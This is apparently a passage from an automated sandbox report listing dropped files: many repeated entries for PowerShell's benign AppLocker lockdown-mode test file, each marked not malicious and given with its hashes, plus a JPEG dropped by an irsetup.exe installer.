                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
[12 further dropped-file entries with identical metadata (File Type:ASCII text, with no line terminators; Category:dropped; Size (bytes):60; Entropy (8bit):4.038920595031593; Encrypted:false; same SSDEEP, MD5, SHA1, SHA-256 and SHA-512 as above; Malicious:false; Reputation:unknown; same Preview) with Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, plus 1 further identical entry with Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, are not repeated here. Note: this 60-byte script is the probe PowerShell itself writes to the temp directory on start-up to test whether AppLocker or WDAC enforces script policy (lockdown mode); each copy reflects a powershell.exe launch and is not malicious in itself, consistent with Malicious:false.]
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 497x63, components 3
Category:dropped
Size (bytes):2362
Entropy (8bit):7.670995643119166
                                                                                                                  Encrypted:false
